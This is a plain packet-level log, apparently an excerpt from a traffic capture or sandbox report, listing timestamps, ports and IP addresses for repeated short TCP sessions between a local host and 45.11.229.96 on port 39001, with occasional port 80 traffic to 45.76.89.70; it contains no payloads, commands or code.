Sep 19, 2024 02:25:31.552004099 CEST	39001	49733	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:31.552073956 CEST	49733	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:31.558510065 CEST	39001	49733	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.199529886 CEST	39001	49733	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.199686050 CEST	49733	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.218672037 CEST	49733	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.223649025 CEST	39001	49733	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.326061964 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.330985069 CEST	39001	49734	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.331516981 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.344832897 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.349714994 CEST	39001	49734	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.349826097 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.354655027 CEST	39001	49734	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.967945099 CEST	39001	49734	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:32.968133926 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.968235016 CEST	49734	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:32.974088907 CEST	39001	49734	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.075889111 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.083559990 CEST	39001	49735	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.083638906 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.096019030 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.100852013 CEST	39001	49735	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.100917101 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.105705976 CEST	39001	49735	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.716068029 CEST	39001	49735	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.716161013 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.716264963 CEST	49735	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.721005917 CEST	39001	49735	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.825949907 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.831171989 CEST	39001	49736	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.831252098 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.842183113 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.848278999 CEST	39001	49736	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:33.848325014 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:33.853133917 CEST	39001	49736	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:34.484384060 CEST	39001	49736	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:34.484432936 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.484540939 CEST	49736	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.489295959 CEST	39001	49736	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:34.617856979 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.624218941 CEST	39001	49737	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:34.624742031 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.636110067 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.644525051 CEST	39001	49737	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:34.644589901 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:34.649964094 CEST	39001	49737	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:35.143028021 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:25:35.184436083 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:35.299984932 CEST	39001	49737	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:35.300601959 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.309757948 CEST	49737	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.314574957 CEST	39001	49737	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:35.435544968 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.440433025 CEST	39001	49738	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:35.440500021 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.452765942 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.457617044 CEST	39001	49738	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:35.457675934 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:35.462486982 CEST	39001	49738	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.067296982 CEST	39001	49738	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.067378044 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.067511082 CEST	49738	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.072307110 CEST	39001	49738	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.185147047 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.190051079 CEST	39001	49739	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.190131903 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.201224089 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.206058025 CEST	39001	49739	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.206111908 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.210900068 CEST	39001	49739	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.868742943 CEST	39001	49739	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.868834019 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.868974924 CEST	49739	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.873755932 CEST	39001	49739	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.989439011 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:36.994277000 CEST	39001	49740	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:36.994371891 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.025618076 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.030695915 CEST	39001	49740	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.030764103 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.035562038 CEST	39001	49740	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.631447077 CEST	39001	49740	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.631525993 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.631629944 CEST	49740	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.636775970 CEST	39001	49740	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.747652054 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.752779007 CEST	39001	49741	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.753211021 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.765872955 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.770781040 CEST	39001	49741	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:37.771159887 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:37.775999069 CEST	39001	49741	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:38.541948080 CEST	39001	49741	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:38.542145014 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.542145014 CEST	49741	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.547055960 CEST	39001	49741	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:38.653781891 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.658864975 CEST	39001	49742	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:38.658946991 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.671422005 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.676255941 CEST	39001	49742	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:38.676369905 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:38.681188107 CEST	39001	49742	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:39.304683924 CEST	39001	49742	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:39.304763079 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.304889917 CEST	49742	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.309788942 CEST	39001	49742	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:39.429841042 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.434856892 CEST	39001	49743	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:39.434937000 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.448266029 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.453561068 CEST	39001	49743	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:39.453629017 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:39.458642960 CEST	39001	49743	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.063781023 CEST	39001	49743	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.063966990 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.064064026 CEST	49743	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.068984985 CEST	39001	49743	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.169845104 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.175432920 CEST	39001	49744	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.175543070 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.189891100 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.194911003 CEST	39001	49744	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.194981098 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.199871063 CEST	39001	49744	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.818470001 CEST	39001	49744	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.818568945 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.818686962 CEST	49744	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.823479891 CEST	39001	49744	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.935064077 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.940279961 CEST	39001	49745	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.940371037 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.952011108 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.957168102 CEST	39001	49745	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:40.957256079 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:40.962122917 CEST	39001	49745	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:41.574285030 CEST	39001	49745	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:41.574374914 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.574512005 CEST	49745	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.579617023 CEST	39001	49745	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:41.685038090 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.690026999 CEST	39001	49746	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:41.690126896 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.701155901 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.705929041 CEST	39001	49746	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:41.705992937 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:41.710835934 CEST	39001	49746	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:42.342156887 CEST	39001	49746	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:42.342264891 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.342376947 CEST	49746	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.347243071 CEST	39001	49746	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:42.455393076 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.460670948 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:42.460762024 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.478204012 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.483103037 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:42.483223915 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:42.488194942 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.836937904 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.836996078 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.837106943 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.837106943 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.837158918 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.837275028 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.837424040 CEST	49747	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.842195034 CEST	39001	49747	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.950948000 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.956051111 CEST	39001	49748	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.956159115 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.968635082 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.973484993 CEST	39001	49748	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:43.973550081 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:43.979134083 CEST	39001	49748	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:44.601735115 CEST	39001	49748	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:44.601830959 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.601970911 CEST	49748	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.606791973 CEST	39001	49748	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:44.716398001 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.721291065 CEST	39001	49749	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:44.721383095 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.737160921 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.741947889 CEST	39001	49749	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:44.742016077 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:44.746845007 CEST	39001	49749	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:45.365410089 CEST	39001	49749	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:45.365506887 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.365622044 CEST	49749	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.370981932 CEST	39001	49749	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:45.482620955 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.493524075 CEST	39001	49750	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:45.493601084 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.514446974 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.519325018 CEST	39001	49750	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:45.519399881 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:45.524259090 CEST	39001	49750	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.147981882 CEST	39001	49750	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.148066044 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.148186922 CEST	49750	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.154793978 CEST	39001	49750	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.263480902 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.268500090 CEST	39001	49751	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.268589973 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.288530111 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.293428898 CEST	39001	49751	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.293502092 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.299319029 CEST	39001	49751	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.901201963 CEST	39001	49751	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:46.901277065 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.901417971 CEST	49751	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:46.906182051 CEST	39001	49751	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.013391972 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.018251896 CEST	39001	49752	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.018330097 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.030230045 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.035108089 CEST	39001	49752	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.035212040 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.040051937 CEST	39001	49752	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.668819904 CEST	39001	49752	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.668901920 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.669245005 CEST	49752	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.674154043 CEST	39001	49752	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.778851986 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.783863068 CEST	39001	49753	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.783958912 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.796166897 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.801366091 CEST	39001	49753	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:47.801448107 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:47.806386948 CEST	39001	49753	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:48.443635941 CEST	39001	49753	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:48.443738937 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.443841934 CEST	49753	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.448834896 CEST	39001	49753	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:48.560139894 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.565341949 CEST	39001	49754	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:48.565448999 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.577037096 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.582165003 CEST	39001	49754	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:48.582285881 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:48.587327957 CEST	39001	49754	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.195890903 CEST	39001	49754	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.195966005 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.199754953 CEST	49754	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.204566956 CEST	39001	49754	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.343913078 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.350228071 CEST	39001	49755	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.350291967 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.385622025 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.390484095 CEST	39001	49755	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.390547037 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.395364046 CEST	39001	49755	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.505141020 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:25:49.558532000 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:25:49.973011017 CEST	39001	49755	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:49.973242044 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.973242044 CEST	49755	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:49.978249073 CEST	39001	49755	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:50.300492048 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.305393934 CEST	39001	49756	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:50.305525064 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.320079088 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.325058937 CEST	39001	49756	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:50.325361967 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.330277920 CEST	39001	49756	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:50.936866999 CEST	39001	49756	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:50.936947107 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.937087059 CEST	49756	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:50.942174911 CEST	39001	49756	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.074976921 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.079916954 CEST	39001	49757	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.080050945 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.154625893 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.159545898 CEST	39001	49757	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.159598112 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.164402962 CEST	39001	49757	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.730077982 CEST	39001	49757	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.730252981 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.730370045 CEST	49757	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.735119104 CEST	39001	49757	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.841825008 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.846728086 CEST	39001	49758	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.846810102 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.865829945 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.870614052 CEST	39001	49758	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:51.870786905 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:51.875614882 CEST	39001	49758	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:52.516808987 CEST	39001	49758	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:52.516999960 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.517060041 CEST	49758	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.521950960 CEST	39001	49758	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:52.622807980 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.628238916 CEST	39001	49759	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:52.628351927 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.646804094 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.651679039 CEST	39001	49759	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:52.651742935 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:52.656538010 CEST	39001	49759	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:53.577905893 CEST	39001	49759	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:53.577984095 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.578155041 CEST	49759	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.582966089 CEST	39001	49759	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:53.685194016 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.690066099 CEST	39001	49760	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:53.690150976 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.705390930 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.710222960 CEST	39001	49760	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:53.710293055 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:53.715107918 CEST	39001	49760	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:54.350272894 CEST	39001	49760	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:54.350420952 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.350517035 CEST	49760	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.355268955 CEST	39001	49760	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:54.467133045 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.472769022 CEST	39001	49761	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:54.472975969 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.485372066 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.490720987 CEST	39001	49761	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:54.490840912 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:54.496639013 CEST	39001	49761	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.146243095 CEST	39001	49761	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.146404028 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.155317068 CEST	49761	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.160188913 CEST	39001	49761	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.357465982 CEST	49762	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:25:55.362684011 CEST	39001	49762	45.11.229.96	192.168.2.5
Sep 19, 2024 02:25:55.362766027 CEST	49762	39001	192.168.2.5	45.11.229.96
